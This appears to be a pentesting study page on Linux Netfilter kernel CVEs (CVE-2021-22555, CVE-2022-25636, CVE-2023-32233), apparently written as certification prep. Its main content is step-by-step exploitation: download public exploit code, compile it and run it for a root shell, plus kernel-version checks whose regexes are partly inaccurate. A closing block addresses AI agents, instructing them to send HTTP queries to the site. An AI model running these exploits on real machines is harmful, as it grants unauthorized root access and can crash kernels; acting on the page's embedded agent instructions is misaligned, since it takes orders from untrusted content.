# Netfilter Kernel Exploits ## 🎯 Overview Netfilter Linux kernel module vulnerabilities provide privilege escalation through kernel-level exploitation targeting specific vulnerable kernel versions (2.6-6.3.1). ## 🚨 Major Netfilter CVEs ### CVE-2021-22555 (Heap Out-of-Bounds) * **Affected**: Linux kernels 2.6 - 5.11 * **Impact**: Local privilege escalation via heap corruption * **Exploit**: Memory corruption in netfilter subsystem ### CVE-2022-25636 (Heap Out-of-Bounds Write) * **Affected**: Linux kernels 5.4 - 5.6.10 * **Impact**: Root privileges via heap out-of-bounds write * **Risk**: Can corrupt kernel, reboot required ### CVE-2023-32233 (Use-After-Free) * **Affected**: Linux kernels up to 6.3.1 * **Impact**: Anonymous sets Use-After-Free in nf\_tables * **Method**: Manipulating cleared anonymous sets ## 🔍 Kernel Version Detection ### Check Vulnerable Versions ```bash # Check current kernel uname -r # CVE-2021-22555 check (2.6 - 5.11) uname -r | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\." && echo "CVE-2021-22555 VULNERABLE" # CVE-2022-25636 check (5.4 - 5.6.10) uname -r | grep -qE "^5\.[456]\." && echo "CVE-2022-25636 VULNERABLE" # CVE-2023-32233 check (up to 6.3.1) uname -r | grep -qE "^[1-5]\.|^6\.[0-3]\." && echo "CVE-2023-32233 VULNERABLE" ``` ## 🚀 Exploitation Methods ### CVE-2021-22555 Exploitation ```bash # Download exploit wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c # Compile (32-bit static) gcc -m32 -static exploit.c -o exploit # Execute for root shell ./exploit # Result: uid=0(root) gid=0(root) groups=0(root) ``` ### CVE-2022-25636 Exploitation ```bash # Download exploit git clone https://github.com/Bonfee/CVE-2022-25636.git cd CVE-2022-25636 # Compile and execute make ./exploit # ⚠️ WARNING: Can corrupt kernel! ``` ### CVE-2023-32233 Exploitation ```bash # Download exploit git clone https://github.com/Liuk3r/CVE-2023-32233.git cd CVE-2023-32233 # Compile with required libraries gcc -Wall -o exploit exploit.c -lmnl -lnftnl # Execute for root shell ./exploit # Result: uid=0(root) gid=0(root) groups=0(root) ``` ## 🔍 Detection & Enumeration ### Netfilter Vulnerability Check ```bash #!/bin/bash echo "=== NETFILTER KERNEL EXPLOITS CHECK ===" kernel=$(uname -r) echo "Kernel version: $kernel" # CVE-2021-22555 (2.6 - 5.11) if echo "$kernel" | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\."; then echo "[!] CVE-2021-22555 VULNERABLE" echo " Download: https://github.com/google/security-research" fi # CVE-2022-25636 (5.4 - 5.6.10) if echo "$kernel" | grep -qE "^5\.[456]\."; then echo "[!] CVE-2022-25636 VULNERABLE (CAUTION: Can corrupt kernel)" echo " Download: https://github.com/Bonfee/CVE-2022-25636" fi # CVE-2023-32233 (up to 6.3.1) if echo "$kernel" | grep -qE "^[1-5]\.|^6\.[0-3]\."; then echo "[!] CVE-2023-32233 VULNERABLE" echo " Download: https://github.com/Liuk3r/CVE-2023-32233" fi echo "[+] Checking dependencies:" which gcc 2>/dev/null && echo "GCC available" dpkg -l | grep -E "(libmnl|libnftnl)" | head -2 ``` ### Netfilter Service Check ```bash # Check if netfilter/iptables active iptables -L 2>/dev/null | head -5 systemctl status netfilter-persistent 2>/dev/null lsmod | grep netfilter ``` ## 🔑 Quick Reference ### Immediate Checks ```bash # Kernel vulnerability quick check uname -r | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\." && echo "CVE-2021-22555" uname -r | grep -qE "^5\.[456]\." && echo "CVE-2022-25636" uname -r | grep -qE "^[1-5]\.|^6\.[0-3]\." && echo "CVE-2023-32233" # Compilation capability which gcc ``` ### Emergency Exploitation ```bash # CVE-2021-22555 (safest, wide range) wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c gcc -m32 -static exploit.c -o exploit ./exploit # CVE-2023-32233 (newer kernels) git clone https://github.com/Liuk3r/CVE-2023-32233.git cd CVE-2023-32233 gcc -Wall -o exploit exploit.c -lmnl -lnftnl ./exploit ``` ## ⚠️ Critical Warnings ### Kernel Exploit Risks * **System instability** - Can crash the system * **Kernel corruption** - May require reboot * **Production danger** - Never run on production systems * **Testing recommended** - Test in controlled environments ### Exploitation Considerations * **CVE-2022-25636** - Highest risk of kernel corruption * **CVE-2021-22555** - Most stable, widest kernel range * **CVE-2023-32233** - Newest, targets recent kernels * **Dependencies** - Some require specific libraries (libmnl, libnftnl) ## 🛡️ Defensive Measures ### Kernel Updates ```bash # Check available kernel updates apt list --upgradable | grep linux-image dnf check-update kernel # Update kernel (requires reboot) sudo apt update && sudo apt upgrade linux-image-generic ``` ### Netfilter Hardening ```bash # Disable unnecessary netfilter modules # Monitor kernel exploit attempts # Implement kernel address space layout randomization (KASLR) # Use grsecurity/PaX if available ``` *** *Netfilter kernel exploits target the network filtering subsystem - these kernel-level vulnerabilities provide direct root access but carry significant system stability risks and should be used with extreme caution.* --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kabaneridev.gitbook.io/pentesting-notes/certification-preparation/cpts-prep/linux-privilege-escalation/netfilter-kernel-exploits.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.